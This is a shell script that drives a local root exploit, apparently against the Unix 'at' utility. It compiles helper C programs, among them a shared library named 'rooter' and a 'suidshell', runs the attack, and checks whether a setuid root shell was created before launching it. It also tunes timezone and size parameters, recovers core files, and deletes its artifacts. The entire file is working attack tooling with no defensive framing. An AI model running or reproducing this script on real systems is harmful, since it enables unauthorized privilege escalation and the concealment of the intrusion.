#!/bin/sh

function cleanup {
 rm -f run ~/attmp/bep bep.c ~/attmp/rooter.so
 rm -f rooter.c ~/attmp/suidshell run.c suidshell.c
 rm -fr /tmp/atexpl*/
}

function die {
 echo $1" didn't work."
 echo "You may need to find another TZONE and SIZ for run.c"
 cleanup
 exit 1
}


function makerun {
 [ -d ~/attmp ] || mkdir ~/attmp || die "Making ~/attmp"
 sed -e 's,HOMEDIR,"'$HOME'",' < run.inp > run.c
 cc -pipe run.c -o run

}
[ -z $1 ] 

function mainstuff {
 sed -e "s,HOME,$HOME," < bep.inp > bep.c
 cc -pipe bep.c -o ~/attmp/bep
 sed -e "s,HOME,$HOME," < rooter.inp > rooter.c
 cc -pipe -shared rooter.c -o ~/attmp/rooter.so -nostdlib
 sed -e "s,HOME,$HOME," < suidshell.inp > suidshell.c
 cc -pipe suidshell.c -o ~/attmp/suidshell
 ./run 2>/dev/null || die "Getting the shell to work" 
 at 2> /dev/null
 [ -u ~/attmp/suidshell ] || die "Creating suidshell"
 ~/attmp/suidshell
 cleanup
 exit 0
}

function usage {
 echo $0 TZONE OFFSET
 exit 1
}

function testbep {
 cat > $1 <<EoF
#!/bin/sh
echo 'Changing these lines: 

#define DEFTZONE "NZ-CHAT"  
#define SIZ 120 

into 

#define DEFTZONE "'$2'"  
#define SIZ '$3' 

and now $0 should work to get root.'
cd /tmp
cd $PWD
export TMPDIR=/var/tmp
rm run
umask 0
sed \
-e 's,HOMEDIR,"'$HOME'",' \
-e 's,define DEFTZONE "NZ-CHAT",define DEFTZONE "'$2'",' \
-e 's/define SIZ 120/define SIZ '$3'/' < run.inp > run.c
cc -pipe run.c -o run
EoF

chmod +x $1
}

function recover_core {
 echo -n Noticed core file...
 chmod +r /tmp/atexpl*/core 
 mv /tmp/atexpl*/core $PWD 
 [ ! -e /tmp/atexpl*/core ] && [ -e $PWD/core ] && \
 echo recovered to $PWD. || echo but could not recover it.
}

umask 076
[ $# -ne 0 ] && [ $# -ne 2 ] && [ $# -ne 3 ] && usage
[ -z $HOME ] && export HOME=/var/tmp
[ -e ./run ] || makerun
[ $# -eq 0 ] && mainstuff 
testbep $HOME/attmp/bep $1 $2 $3
./run $1 $2
[ -e /tmp/atexpl*/core ] && recover_core 
rm -r /tmp/atexpl*
